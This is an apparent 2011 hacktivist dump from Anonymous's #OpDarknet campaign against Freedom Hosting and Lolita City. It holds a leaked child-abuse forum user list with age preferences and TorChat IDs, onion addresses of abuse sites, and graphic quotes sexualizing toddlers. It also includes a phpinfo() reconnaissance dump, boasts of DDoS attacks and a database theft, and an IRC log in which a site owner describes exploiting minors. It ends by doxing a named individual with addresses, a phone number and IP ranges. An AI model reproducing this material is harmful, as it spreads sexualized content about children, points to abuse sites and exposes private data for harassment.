JohnnQ 0 0 0 1w, 2d
finderkicker 6 - 16 6 - 14 qkhv3mi7dtyy733v 0 0 0 1w, 1d
trixy 8,11 - 17,18+ 0 0 0 1w, 1d
OMG 4,7 - 10,14 4,6 - 9,10 0 0 0 1w, 1d
solace 9,12 - 17,18+ 0 0 0 1w, 1d
TCU 0 0 0 1w, 20h
MiscM 0 0 0 1w, 1h
asdfasdfasdf 0 0 0 6d, 20h
ROOD19 0 0 0 6d, 15h
kane69killer 0 0 0 6d, 14h
jamesbond 0 0 0 6d, 12h
Shiva 0 0 0 6d, 6h
embe 0 0 0 6d, 5h
perro 0,18+ - 18+ 0,17 - 17 0 0 0 6d, 55m
wowowo 0 0 0 5d, 15h
4all 0 0 0 5d, 10h
teenpedo 0 0 0 5d, 7h
dave 0 0 0 5d, 7h
z1. likes 0 0 0 5d, 4h
galford222 0 0 0 5d, 46m
jizi24 0 0 0 4d, 8h
inferno 0 0 0 4d, 8h
www 0 0 0 4d, 1h
virgincreed 0 0 0 4d, 8m
Qubrik 0 0 0 3d, 22h
happytree 8 - 15 0,8 - 12,14 0 0 0 3d, 15h
Abra 0 0 0 3d, 13h
adx 0 0 0 3d, 12h
Zungenkuss 4,5 - 10,11 0 0 0 3d, 5h
abhomo 0 0 0 3d, 5h
yngpuslvr 7,9 - 12,14 0 0 0 3d, 2h
themask 0 0 0 3d, 1h
PedoSpain 1 - 10,18+ 1 - 10,18+ etixgft4t5tsf7bf 0 0 0 3d, 3m
butterbutter 0 0 0 2d, 21h
Astralnax 0 0 0 2d, 20h
Domtis 0 0 0 2d, 13h
geiler 0,4 - 11,18+ pfs6oj7tmmyfdma2 0 0 0 2d, 11h
festermolester 0 0 0 2d, 58m
sifox 10,13 - 14,17 12,13 - 14,16 0 0 0 2d, 38m
anonymous01 0 0 0 1d, 23h
zztop 4 - 10,11 63 0 5 1 3w, 2d
Juppi 0 - 12 please add my torchat only if you have a reason bgwkxjlfkuiouyaw 0 0 4 97 6d, 13h
haiku 2,4 - 9,12 8 0 4 80 3mo, 2d
Jackyl 3,6 - 12,16 rp4t5ov5a5gcuft4 58 0 4 66 4mo, 3d
Toy-maker 4,8 - 11,18+ 4 - 10 39 0 4 62 3mo, 2w
PerverseKerstin 3,5 - 10,13 8,10 - 15,16 u2w44onignrujpe3 47 0 4 59 1mo, 1w
someguy 0 0 4 58 1mo, 3w
lundboy 0 - 8,14 0 - 8,12 84 0 4 48 2w, 3d
candy 6,7 - 12 154 0 4 31 2mo, 2w
LittleGirlLover 0 4 13 4 26 9mo, 3w
Nutri-Milk 3,6 - 11,14 nutrim e2cspwpzho3whcx3 104 0 4 26 1mo, 4d
renots 8 2 1 4 19 7mo, 1w
heretic 1,3 - 10,14 11 2 15 4 18 9mo, 17h
BlubberNugget 11,12 - 15 14 0 4 6 1mo, 1d
girlsgirlsgirls 10,12 - 18+ 52 0 4 5 2mo, 1w
richib 22 0 3 97 3w, 1d
hkpm 2,4 - 17,18+ hkpman dgvvhrk7hovt2z6e 2 0 3 82 5mo, 1w
indeed 0,1 - 11,12 20 0 3 78 2mo, 1w
jyb_loves_cock 5 - 12,18+ Me encanta el pene. I just love cock, what can I do. New nickname for
jyb. 15 0 3 57 2w, 6d
MrTeddy 56 0 3 55 4mo, 2w
48406 0,6 - 12,18+ 0,4 - 8,10 0 0 0 1d, 12h
ZoeyBoy likes 2,4 - 14,17 0 0 0 1d, 4h
ToddlerTime 1 - 5 1 - 12 nqz2elhfc6mb4ma2 0 0 0 1d, 3h
PapaPrimo 2 - 10 prfpuwzc6seyhand 0 0 0 1d, 51m
jinky 0 0 0 15h, 1m
sammiesamdog 0 0 0 14h, 12m
likesemlil 0 0 0 10h, 49m
6114pbt 3,4 - 14,18+ 0 0 0 4h, 33m
komp 1,2 - 6,9 komp 32 1 21 3 46 5mo, 4w
Axlorma 2,3 - 9,10 2,3 - 8,10 Axlorma rpiyp2ppipju6mmm 3 18 3 41 5mo, 3w
Vitek 2 0 3 37 2mo, 3w
theanon 1,9 - 17,18+ 14 0 3 33 3mo, 3w
Username 69 3 25 3 25 9mo, 2w
clit_kid 3,4 - 10,12 43 0 3 18 2mo, 1d
b123 6,7 - 10,11 0 0 3 17 4mo, 2d
All_I_Need 26 1 58 3 14 6mo, 1w
sungod 4,6 - 10,12 30 0 3 11 3mo, 2w
dadrumer 9,11 - 16,18+ 0 0 3 1 2mo, 1d
Arbiter 20 2 6 2 90 6mo, 5d
gizmo 0 2 29 2 88 8mo, 4w
afta 5,9 - 17,18+ afta 48 0 2 84 1mo, 1w
Slurp 38 0 2 74 4mo, 6h
PedoGirl 0,2 - 12,14 0 0 2 73 2mo, 1w
crisangel 27 2 70 2 70 9mo, 2w
amyslists 0 2 27 2 67 6mo, 3w
gn7 0,3 - 10,13 0 0 2 64 3mo, 3d
voinic 1,4 - 10,13 1,5 - 9,10 mscyns2sql2e7u3w 0 0 2 64 2w, 4d
Tomaki 3,5 - 13,18+ 12 2 39 2 55 6mo, 3d
1589 total users
#OpDarknet—death of pedo bear
As bear hunting season came to a close, we the Anonymous hunters grew
weary of waiting for big brother to protect us with their words of
encouragement. As we waited, silently, we thought we may have caught the
glimpse of a pedo for the hunt. But no, it was pedo bear who was brought
back from the dead despite our previous attempts to send pedo bear against
the kiddie porners.
Pedo bear came at us with vengeance, we had no choice but to load THOR
for to end the hunt of #opdarknet. We found that the darksite
FreedomHosting was the major provider of darknet CP sites, including the
popular Lolita City.
We took our tracking equipment and set traps. Despite our endless looking,
we could not find pedo bear. We recruited many supporters and 'The Legion'
to help track down pedo bear.
First we took am at The Hidden Wiki for their inability to delete the links to
the child porno links on the hidden 'Hard Candy' page. Second we found that
FreedomHosting was overlooking that a majority of the 100 GB of data was
Child Pornography on it's server. We took our brave Anonymous members
with THOR loaded knowing the pedo bear was hiding in the walls of the
pedo fort (http://xqz3u5drneuzhaeo.onion).
We broke down the heavily fortified door of the Pedo fort. We cocked
THOR and fired Nyan Nyan bullets in every direction. After a bloody battle
with trolls, pedos, and pedo bear, we Anonymous became victorious. What
was left of pedo fort, pedo bear, and fellow pedos was a 100 mile hole.
Lolita City and it's neighboring 40+ pedo strongholds were destroyed.
We prevailed. We do not forget, and we will continuously fight for the idea.
#opdarknet
Pedo bear's white flag (as of Saturday, 15/OCTOBER/2011 06:00 AM -
GMT+1): http://i55.tinypic.com/vy9w7k.jpg
#occupywallstreet, #freeanons, #freetopiary, #antisec
We are Anonymous.
We are Legion.
We do not forgive.
We do not forget.
Expect us.
--------
phpinfo() of FreedomHosting:
System FreeBSD server 8.2-RELEASE-p3 FreeBSD 8.2-RELEASE-p3
#0: Tue Sep 27 18:45:57 UTC 2011 root@amd64-
builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC amd64
Build Date Aug 26 2011 03:00:30
Configure Command './configure' '--with-layout=GNU' '--
localstatedir=/var' '--with-config-file-scan-dir=/usr/local/etc/php' '--disable-
all' '--enable-libxml' '--with-libxml-dir=/usr/local' '--with-pcre-
regex=/usr/local' '--with-zlib-dir=/usr' '--program-prefix=' '--disable-cgi' '--
with-apxs2=/usr/local/sbin/apxs' '--with-regex=php' '--with-zend-vm=CALL'
'--disable-ipv6' '--prefix=/usr/local' '--mandir=/usr/local/man' '--
infodir=/usr/local/info/' '--build=amd64-portbld-freebsd8.2'
Server API Apache 2.0 Handler
Virtual Directory Support disabled
Configuration File (php.ini) Path /usr/local/etc
Loaded Configuration File /usr/local/etc/php.ini
Scan this dir for additional .ini files /usr/local/etc/php
Additional .ini files parsed /usr/local/etc/php/extensions.ini
PHP API 20090626
PHP Extension 20090626
Zend Extension 220090626
Zend Extension Build API220090626,NTS
PHP Extension Build API20090626,NTS
Debug Build no
Thread Safety disabled
Zend Memory Manager enabled
Zend Multibyte Support disabled
IPv6 Support disabled
Registered PHP Streams php, file, glob, data, http, ftp, zip, compress.zlib
Registered Stream Socket Transports tcp, udp, unix, udg
Registered Stream Filters convert.iconv.*, string.rot13, string.toupper,
string.tolower, string.strip_tags, convert.*, consumed, dechunk, zlib.*

Configuration
apache2handler
Apache Version Apache
Apache API Version 20051115
Server Administrator [email protected]
Hostname:Port xqz3u5drneuzhaeo.onion:0
User/Group www(80)/80
Max Requests Per Child: 10000 - Keep Alive: off - Max Per
Connection: 100
Timeouts Connection: 900 - Keep-Alive: 60
Virtual Server Yes
Server Root /usr/local
Loaded Modules core prefork http_core mod_so mod_authz_host
mod_file_cache mod_cache mod_disk_cache mod_filter mod_deflate
mod_env mod_expires mod_headers mod_setenvif mod_mime mod_status
mod_autoindex mod_dir mod_alias mod_rewrite mod_bw mod_php5
mod_alias_basedir mod_vhost_alias_frdmhst
Apache Environment
Variable Value
HTTP_HOST xqz3u5drneuzhaeo.onion
HTTP_CONNECTION close
HTTP_USER_AGENT Mozilla/5.0 (Windows NT 6.1; rv:5.0)
HTTP_ACCEPT
 text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
HTTP_ACCEPT_LANGUAGE en-us,en;q=0.5
HTTP_ACCEPT_CHARSET ISO-8859-1,utf-8;q=0.7,*;q=0.7
HTTP_DNT 1
HTTP_COOKIE visitz=0; sort=0a
PATH /bin:/usr/bin:/usr/ucb:/usr/bsd:/usr/local/bin
SERVER_SIGNATURE no value
SERVER_SOFTWARE Apache
SERVER_NAME xqz3u5drneuzhaeo.onion
SERVER_ADDR 10.0.1.2
SERVER_PORT 80
REMOTE_ADDR 10.0.1.2
DOCUMENT_ROOT /home/fh/www
SERVER_ADMIN [email protected]
SCRIPT_FILENAME /home/fh/users/l/o/lolitas/www/index.php
REMOTE_PORT 56818
GATEWAY_INTERFACE CGI/1.1
SERVER_PROTOCOL HTTP/1.0
REQUEST_METHOD GET
QUERY_STRING no value
REQUEST_URI /users/lolitas/index.php
SCRIPT_NAME /users/lolitas/index.php
#OpDarknet Official Release 10/19/2011
It is unfortunate that we have to make this release, but is very necessary due
to all of the media surrounding this operation. First of all, we want everyone
to know that there are many people working on this operation, some of them
with unique skill sets, and others who are just showing support. #OpDarknet
is a massive operation that will take months to complete.
Issue 1: Gulli.com
Yesterday we made a release about the Gulli.com article, people who read the
release took it out of context, it WAS NOT meant to say that Gulli was trying
to smear the operation, or that they should not be trusted. Gulli and
Anonymous have always been on good terms. The article was meant to state
that some of the information provided was incorrect, a human error, not that
Gulli, or the reporter was attempting to defraud anyone.
Issue 2: th3j35t3r
A person who had been working with #OpDarknet created an account with
this name and used it to infiltrate "Lolita City" the reasoning this person had
behind using the name th3j35t3r we do not know, but this person is no longer
part of #OpDarknet.
Issue 3: joepie91
The same person mentioned above provided the d0xing on the "Lolita City"
user "svet28" after being asked to further investigate, we have redone the
d0xing and come to the conclusion that this ID DOES NOT belong to
joepie91, and joepie91 does not have an account on "Lolita City"
Our Statement:
Due to the incidents above, #OpDarknet will no longer allow new comers to
help with this operation. This will set back our progress, but we would rather
bring you the correct data than have to keep writing these releases due to the
fact that someone has a personal problem with th3j35t3r and joepie91. We do
apologize to th3j35t3r and joepie91 for the mix up, it will not happen again.
We are Anonymous.
We are Legion.
We do not Forgive.
We do not Forget.
Expect Us.
#OpDarknet | Our humble beginnings & clarification
#OpDarknet Official Release 10/20/2011
In our humble journey into the depths of the 'darknet', we garnered much
support for this operation and also encountered much resistance. At first
most of the Anons never knew much about the 'darknet'. The only
knowledge about underground was from the June 1st, 2011 article by Adrian
Chen regarding "The Silk Road".
On October 6th, 2011 some of us Anon were doing research into encryption
and security. The 'darknet' sites of TOR, I2P, and Freenode peaked our
interest. We were aware that, TOR and I2P where originally designed to
protect individuals from the oppressive governments of China, Iran and
protect Free Speech.
What we discovered was quite the opposite. An growing and large of
community of pedophiles was abusing such systems for personal profit. To
demonstrate this, The Hidden Wiki's "hidden" section, the 'Hard Candy' is
stated to be:
* This wiki page discusses resources specifically for people who are
attracted to children. This can include everything from discussion groups to
ostensibly legal images of children in dresses to full-out child pornography.
The term children here refers to children and teenagers.
To explain how popular this community of pedophiles is. The total page
views of the Hidden Wiki 'Hard Candy' section as of October 20th, 2011 is a
total 2,055,701. The total view count of main index (non-pedophilia content)
of The Hidden Wiki was 2,677,430 time.
From there we Anons were challenged by some of the 'darknet' citizens of
The Silk Road to try and take out 'Lolita City' . Rather than take the risk of
accessing content of this underground site, we pointed our special 'darknet'
web crawlers aka 'Pedo Bear' to dump the TEXT content of the first two
pages of 'Lolita City'. From what was analyzed, there were disturbing
comments by the pedophilia community stating things like:
"GashTrainer" replied to a picture with the message "Yes and most
of the pain should be inflicted on that tight little toddler cunt. That's where
the bitch needs it most." and another replied to the same comment with
"Mmm...toddler rape-meat ready for a good hard fucking."
Based on that, some of us Anons took a vow to bring down Lolita City, as
one of our Anons was a victim of child abuse. So we started #OpDarknet, to
reveal to the WWW the perversion and abuse by the pedophilia community
to the underground 'darknet' community.
We immediately started to developed our own tools called 'The Legion',
'THOR' or now it is now known as 'Chris Hansen'. Our first attack was to
dump the user database of Lolita City as referenced in:
http://pastebin.com/88Lzs1XR. Further analysis of the 'Hard Candy' section
also revealed that a majority of pornography sites were hosted by Freedom
Hosting.
Freedom Hosting has an official ToS of "We do not give permission for
upload of any illegal files." Knowing such we then started our operation
against Freedom Hosting. First we compromised Lolita City, and two other
pedophile sites on Freedom Hosting and uploaded our 'The Legion' script.
As an precaution we had four other sites that were created on 'Freedom
Hosting' for the purposes of hosting 'Anonymous' related material.
After running 'The Legion' and 'Chris Hansen' against Freedom Hosting. We
were successful in bringing down the entire Freedom Hosting service for 30
hours. The outage affected 40+ of the Child Pornography sites listed on the
Hidden Wiki - 'Hard Candy'. We then started to broadcast our messages via
Twitter of our success.
We then started an #occupyHiddenWiki movement in protest of the
community in their refusal to delete CP related material. In the following
days, many then started in offering their help our our cause #OpDarknet.
Some were responsible for the analysis and 'dox' of some of the Lolita City
user database dump.
One individual due to personal reasons, decided to include 'th3j35t3r' and
'joepie' onto the list. This unfortunately cause a lot of chaos and that such
individual is no longer involved with #OpDarknet. We have removed
references to both th3j35t3r and joepie. Us the original #OpDarknet Anons
believe it was an smear campaign by the pedophile community to cause
chaos among #OpDarknet. (See: http://pastebin.com/NSDP2rfA)
After the server outages of Freedom Hosting were fixed, we found that Lolita
City was not among the deleted compromised accounts we used 'The Legion'
and 'Chris Hansen' against. Also the owner and administrator of Lolita City
or now that we assume is also affiliated with Freedom Hosting several times
threatened #OpDarknet and the #OWS movements. Chat logs of those
conversations can be found at (http://pastebin.com/YHDnL3de and
http://pastebin.com/KakWWp7L). Newer chat logs from October 19th can
be found at the end of this release.
To prove that #OpDarknet is not a fluke, official reasons for the outages of
Hidden Wiki, Lolita City, and Freedom Hosting cause by us Anonymous,
were posted on October 19th, 2011 and October 20th, 2011. They are as
described:
Hidden Wiki 'Hard Candy' section - October 20:
* To the vandals, you vandalize the page 1,000,000 times, we will correct it
1,000,001. It will just go back and forth. We are here to stay. People want to
run DDoS attacks over tor and think it hurts us, it does. It is our GOD given
right that we can choose to have our sexual preferences for youth. It is the
same for the any other porn community. It is not what we choose to become,
it is who we are. You Anonymous aka #OpDarknet do not have the right to
censor us.
Lolita City - Update Oct. 20
* Just in case it's not immediately obvious, the link at
http://pastebin.com/TDzM5G2y is proof of nothing more than having
searched google for some usernames. No private information is present in
that document, and there are no signs of infiltration or hacking. In short it's an
attempt to scare less knowledged users by spreading FUD.
* If there is anything worth pointing out here it is that one should not use
the same username that is used in public places affiliated with real
information. And since no website is hack-safe you should always be careful
what you post here, or anywhere else, just in case something bad does
happen.
* On a related note, the recent slowness was caused by someone DoS-ing
the FH server. A "DoS" attack is not hacking per-se, it just means someone is
making lots of calls really fast to the server slowing it down a lot. FH has also
stated that a daily backup system is in place which is welcomed news.
Freedom Hosting - 19th October 2011 New Registrations reopened... with
a catch.
* Recently FH was the victim of DoS attacks which resulted in
unavailability of php or mysql on hosted sites.
* A user registered an account and used it to run extremely slow mysql
queries among other things to purposely harm the server.
* For this reason we had temporarily closed the creation of new accounts.
* As this appears to be an ongoing attack for the forseeable future, we have
changed our registration system so that to register an account you must be
invited by an existing member.
* All existing members who have logged in to their account in the last 2
months have been given 1 invite for each month you have been a member,
you can use them to invite others.
* Once we have the system setup (soon), if you cant get an invite you will
also have the option to pay a one time fee of about $5 payable in bitcoins.
* We dont really like this solution, but its the only way we can see for
continuing to provide this service in the future.
* I would also like to announce that the snapshot based backup system is up
and running, backups are made daily and kept for upto 1 month, this will
protect against any future data loss due to accounts being hacked.
By October 18th, 2011 the WWW gained attention of #OpDarknet. We were
given additional information by Adrian Chen of Gawker regarding the history
of 'Lolita City' on an Reddit posted 4 months ago at:
http://www.reddit.com/r/IAmA/comments/hmrkd/i_am_the_creator_and_administrator_of
The WWW started to ask about our tools called 'The Legion', 'THOR' aka
'Chris Hansen'. The best way to describe them is to refer at the US patents
#5,621,671 and #6,947,978. Many asked if were simply "script kiddies". No
we specifically developed the tools 'The Legion', 'THOR', 'Chris Hansen' in
protest of Lolita City, Freedom Hosting, and the Hidden Wiki.
References:
* "Underground Website Lets You Buy Any Drug Imaginable", Adrian Chen
(Gawker) - June 1st, 2011:
http://www.wired.com/threatlevel/2011/06/silkroad/
* "Digital simulation of organismal growth ", US patent 5,621,671
* "Method for geolocating logical network addresses", National Security
Agency - USA patent # 6,947,978
* "18 Child Porn Websites Shut Down: Result of Joint U.S.-China
Cooperation", Federal Bureau of Investigation - October 11th, 2011:
http://www.fbi.gov/news/stories/2011/october/websites_101111/websites_101111
One thing is clear, #OpDarknet did reveal that the benevolent community
used to uphold Free Speech against the oppressive governments of Iran and
China. It is now corrupted by the underground of trading and sale of Child
Pornography aka "kiddie porn".
Also Anonymous is a leaderless organization. There is only an idea.
#occupywallstreet, #freeanons, #freetopiary, #antisec
We are Anonymous.
We are Legion.
We do not forgive.
We do not forget.
Expect us.
------
Additional chat logs of Lolita City (aka Freedom Hosting) owner - dated
October 19th, 2011. Anonymous members in #OpDarknet are redacted to
protect their identites.
* lolita_fucker ([email protected]) has joined #opdarknet
<lolita_fucker> hello you little fuckers
<lolita_fucker> why is my website and hosting company all over the German
news?
<lolita_fucker> you have been causing my Indian tech support headaches all
fucking week with your little "hacking" attempts
<lolita_fucker> there is this fag called "anonymousArson"
<lolita_fucker> is he this fucker VisionZ that has been causing all the fucking
trouble? I just met up with one the users of Lolita City
<lolita_fucker> he's a fucking Bishop
<lolita_fucker> and is now scared because of the media
<*******> hey
<*******> oh yea?
<*******> he's a bishop
<*******> ?
<*******> lol
<*******> Yea fucking right.
<*******> This isn't a ches game.
<lolita_fucker> also one of the big investment bankers for Goldman Sachs is
going to have to fucking bank roll more thugs to fuck around your little
Occupy Wall Street movement
* ******* has quit (Connection closed)
<*******> We know we know where u live.
<*******> Lolita_fucker
<*******> we have ur ip
<*******> Right now i can ddos u
<*******> If i wanted to
<*******> You are an idiot, you came here with no protection.
<lolita_fucker> your little protesters are nothing compared to the people that
use Freedom Hosting and sites like Lolita City
* ******* smells a troll.
<*******> oh yea?
<*******> Then how was it so easy to take down the sites
<lolita_fucker> what fucking IP do you have?
<lolita_fucker> your fucking up the ass?
<lolita_fucker> haha
<lolita_fucker> little cunts
<*******> yours
<*******> Your an indian
<*******> you're an indian.
<lolita_fucker> i told you
<lolita_fucker> that was my fucking IT tech support
<*******> we have ur address
<lolita_fucker> you fuckers have been causing a lot of headaches for our
users
<*******> we're going to report you to your isp
<*******> we've also got dox.
<lolita_fucker> with your "Chris Hansen" who the fuck he is
<*******> That proves he's indina.
<*******> You better leave
<*******> now, or you're computer will be rooted.
<lolita_fucker> if you want my home ip connection here is my fucking ip:
85.24.189.121
<*******> will do
<*******> thats not his
<*******> we already have his
<*******> p0ke gave it to us
<*******> lol
<lolita_fucker> if you don't think i am fucking around
<lolita_fucker> here you go
<*******> Dude we know you live in india
<*******> we already got your ip address
<lolita_fucker> heh
<*******> and we have access to your vuln computer.
<*******> Who the fuck is he.
<*******> Learn english you stupid fuck.
<*******> Christ, troll harder.
<*******> back in my day....
<lolita_fucker> here is my fucking whois: realname : :: AnonOps Web IRC
:: lolita_fucker is connecting from [email protected]
85.24.189.121
<lolita_fucker> lolita_fucker is using modes +iwx, is using a secure
connection
<*******> it's your IP address.
<lolita_fucker> i am a fucking business man
<*******> Why should we give a fuck.
<*******> Shut the fuck up and jog on.
<lolita_fucker> you CANNOT touch me
<*******> that profits on small children's sexual pictures?
<*******> Oh christ, you sound like one of the Ayn Rand brigade.
<*******> take the pictures down. take the videos down.
<*******> Oh the joys of laissez faire capitalism, rofl.
<*******> Brings you such pleasures as PAEDOPHILIA.
<lolita_fucker> as i said i am one of owner of the two hottest night clubs in
Paris and London
<lolita_fucker> and i have a fucking million dollar import/export business in
Dubai
<*******> No you're not.
<*******> You're a filthy paedophile wasting time trolling on irc.
<*******> get a grip mate.
<*******> pedophiles cant be succesfull
<*******> And money means nothing.
<*******> they can't live a normal life
<*******> they are screw ups
<lolita_fucker> you know how much money i am i losing because of your
fucking "hacking" attempts against my side company Freedom Hosting and
Lolita City?
<*******> disturbing, disgusting
<*******> lets see, child rape, night clubs, guess that means you use drugs
on them?
<lolita_fucker> i already lost £5000
<*******> expect the price to rise.
<*******> Whats money when your self worth is so low due to being
abseloutely fucking dispised by the whole world, even a whisper about your
hobbies getting you linched in an instant and knowing that, knowing that it's
wrong yourself and having to live with that.
<lolita_fucker> once i find out this fucking "arson"
<*******> Even if you DID have that money, it probably wouldn't fill the
hole, would it.
<lolita_fucker> i'll make sure he has a good collection of gay boy porn
* ******* (*******@*******) has joined #opdarknet
<*******> Haha, o
<*******> you're a fucking filthy paedo
<*******> you're going to have 0 profit
<*******> you supposedly run paedo sites
<*******> by the end of the month
<*******> and the best you can come up with is a good collection of gay
boy porn.
<lolita_fucker> because all of you are fucking fags
<*******> Oh, arson must be quaking in his fucking boots mate.
<*******> Us? fags? you're the one posting out gay boy porn mate, sort it
out.
<*******> herp derp.
<lolita_fucker> you fucking sit on this internet chat room all day
<*******> Man, this is lulz as fuck.
<*******> can we keep him?
<lolita_fucker> when you cannot get any real fucking action in the REAL
WORLD
<lolita_fucker> trust me
<*******> ....
<lolita_fucker> when you grow up
<lolita_fucker> you will be one of my site's users
<*******> only after we beat him back to proper health with our magic heal
sticks.
<*******> you masturbate to pictures of children.
<*******> Jesus, you really don't have a leg to stand on.
<lolita_fucker> i don't need to
<lolita_fucker> i get enough fucking pussy
<*******> you support people that post sexual pictures of children.
<lolita_fucker> i have "model scouting" that i do my shit
<*******> Mate, it can't grow fucking hair.
<lolita_fucker> you have no fucking idea how many 17 and 18 lolitas want to
be models
<*******> ...
<lolita_fucker> when I pull up with my G550 benz
<lolita_fucker> they go fucking all over the shit
<*******> that you lie to and place in escourt contracts.
<*******> they are 17, 18, that's called legal you fucking retard.
<lolita_fucker> exactly
<lolita_fucker> oh
* ******* has quit (Ping timeout: 121 seconds)
<lolita_fucker> we have some 14-17 year olds right now in Paris
<*******> *******, can we keep him?
<lolita_fucker> doing this routine
<lolita_fucker> you have no fucking idea
<*******> Haha, ohshit, they are legal *changes age from 17 to 14.*
<*******> haha, really?
<*******> no, but I got an Ip.
<*******> christ.
<*******> did you just do that.
<lolita_fucker> in Sweden where I am now
<lolita_fucker> i am going to produce this awesome reality TV show
<*******> yea
<*******> ur not
<*******> dude, we know you're lying.
<lolita_fucker> you have no fucking idea how many young girls will do to be
on fucking TV
<lolita_fucker> you have no fucking idea
<*******> are you going to show it to your mother?
<*******> that lets you stay in her house still.
<*******> because you're just THAT fucking special.
<lolita_fucker> you have no fucking idea
<lolita_fucker> Lolita City has over 200,000 hits a day
<*******> You have no fucking idea just how special i am!*
<lolita_fucker> that's probably more fucking web site traffic than your little
website in five years
<*******> Hate to break it to you mate, those are our bots. ;)
<*******> so you want us to shut it down?
<*******> it'd be no problem.
<*******> Ohshit, guys, shit shit
<*******> lolita_fucker to you
<*******> http://i.imgur.com/UDtzd.gif
<lolita_fucker> oh you don't fucking believe me?
<*******> how amazing you are is defined by how much trafic you can get
on your filthy paedo website.
<*******> this guy is so fucking cool.
<*******> because all the paedo's want to be his friend.
<*******> :D
<*******> Tbh, this brings up an interesting topic.
<*******> why don't you go get slaped in the face by a bag of baby dicks
Lolita.
<*******> thats what you're into right?
<*******> *******, if a man is seriously mentaly handicaped and has the
mental age of a young person is it still wrong for him to lust after young
people?
<*******> yea hes a danger to society
<lolita_fucker> oh
<*******> unfortunately
<*******> ...mmm yep.
<lolita_fucker> i have powerful friends
<*******> lolita_fucker, Sorry, you're a danger to society.
<*******> you're going to have to be put down.
<lolita_fucker> those thugs that roughed up your OWS
<lolita_fucker> over the weekend
<*******> ... you need chemical enhancement lolita.
<*******> something to chemically castrate you.
<*******> and then were all going to go
<lolita_fucker> were hired by some big shot investment banker at Goldman
Sachs
<*******> http://i.imgur.com/UDtzd.gif
<*******> remove those sick, fucked up urges.
<*******> Now give us your address and a team will be around to perform
the procedure with a sergical face waffle making curtosty of Doctor Martin.
<lolita_fucker> courtesy of me
* ******* yawns.
<*******> goldman sacks has more important shit to do.
<*******> Hahaha
<*******> and buddy you ain't in that club at all.
<*******> Goldmen sacks attacks the OWS because a filthy basment
dwellin paedo asked them too.
<lolita_fucker> as i told you
<lolita_fucker> i'm a business man
<lolita_fucker> i have a model agency
<*******> that can't do business for shit?
<*******> are you david ike?
<*******> alex jones?
<*******> Do lizard men rule the world?
<lolita_fucker> in Sweden, Dubai, Paris, and London
<*******> ;)
<*******> Modeling agency*
<*******> all the greatist basements eh?
<*******> you can't even spell your own buisness, ahahahhaha.
<*******> I got this great lot out in kansas I'd love to show you some time.
<*******> you can bring your pansey ass body guards too
<*******> lolita_fucker, do you understand that we could remove you from
this channel at any time.
<*******> but we don't because you're actualy really fucking amusing.
<lolita_fucker> if you don't fucking believe this shit i have check out Lolita
City: http://m3hjrfh4hlqc67gb.onion
<*******> http://i.imgur.com/UDtzd.gif
<*******> lolita_fucker if u are the admin
<*******> write this on the top "We will avenge you anonymous"
<*******> or whatever u want
<lolita_fucker> no but my IT tech support
<*******> HEY, GUYS, DON'T BELIEVE I'M A SUPER SRS BSNS
MAN 4 REAL CHECK OUT MY PAEDOPHILE RING
<lolita_fucker> put both a message on Freedom Hosting and Lolita City
about your epic fail
<lolita_fucker> Just in case it's not immediately obvious, the link at
http://pastebin.com/TDzM5G2y is proof of nothing more than having
searched google for some usernames. No private information is present in
that document, and there are no signs of infiltration or hacking. In short it's an
attempt to scare less knowledged users by spreading FUD. If there is
anything worth pointing out here it is that one should not use the same
username that is used in publi
<*******> Title: #OpDarknet Lolita City User Base Doxed - Pastebin.com
(at pastebin.com)
<*******> BECAUSE I'M A TOTALY LEGIT MODELING AGENCY
OWNER.
<lolita_fucker> you have no fucking idea
<lolita_fucker> how many boys and girls want to be models
<*******> paedo's are so lulz.
<lolita_fucker> i'm just giving them a way out
<*******> if they didn't fuck kids i could probably enjoy them.
<*******> that logic is infalable.
<*******> I think Im going to put his real idenity into circulation.
<*******> how bout ur case
<lolita_fucker> anyhow
<*******> why do we have ur ip address
<*******> and ur dox
<*******> your real ones
<*******> guys, i guess that todler just wanted to be modeling that cock in
her mouth so badly, he just offerd her a job.
<lolita_fucker> it's 7:40 am in Stockholm
<lolita_fucker> i have some models we going to feature on Lolita City
<lolita_fucker> have fun flapping to them boys
<*******> flapping to them boys?
* lolita_fucker has quit (Quit: pedos 4-ever)
#OpDarknet - Pedo hunt trophies, Bear Rugs for Mike Perry
#OpDarknet Official Release -- 10/30/2011 - Pedo hunt trophies, Bear Rugs
for Mike Perry
In our last battle against Pedo Fort aka Freedom Hosting, we scored a major
victory against the army of child pornographers. We were able to use 'The
Legion' and 'Chris Hansen' to level pedo fort for over about 30 hours. To our
shock, the community of pedos were able to quickly regroup and rebuild
Lolita City and Freedom Hosting within a week. While us Anons regrouped
to plan a new strategy, the World suddenly became aware of our little war
against child pornography.
Amiss the publicity, the pedos collaborated and dreamed of schemes for ways
to disprove Operation Darknet. False stories were planted against the IT
community about us Anons didn't "hack" Freedom Hosting and Lolita City.
What the pedos didn't realize was that we actually took a secret treasure chest
from their pedo fort. We worked silently for weeks to try and crack the lock
containing this treasure that the pedo bear was diligently trying to protect.
At-last, we cracked the lock and found the true identity of the builder and
architect of Freedom Hosting. What we found was truly shocking, it was the
deeds to a California, USA 'shell' company for 12 Tor Exit Nodes named
Formless Networking LLC.
Taken from California Security of State of Corporations:
Formless Networking LLC - http://formlessnetworking.net
California Company registration:
Entity Name: FORMLESS NETWORKING, LLC
Entity Number: 200910610241
Date Filed: 04/10/2009
Status: ACTIVE
Jurisdiction: CALIFORNIA
Entity Address: 740 A 19TH ST #135
Entity City, State, Zip: SAN FRANCISCO CA 94114
Agent for Service of Process: MATTHEW T WHATLEY
Agent Address: 360 5TH ST
Agent City, State, Zip: SAN FRANCISCO CA 94107
Regisistered agent: Matthew T Whatley
ISP for Formless Networking:
Applied Operations, LLC - http://www.appliedops.net/company/
IP range: 199.48.144.0 - 199.48.147.255
 Address: 3080 Raymond St, San Fransico, CA 94159
Phone: (415) 367-7328
Registered agent, Matthre T. Whatley (a "tax" lawyer with no
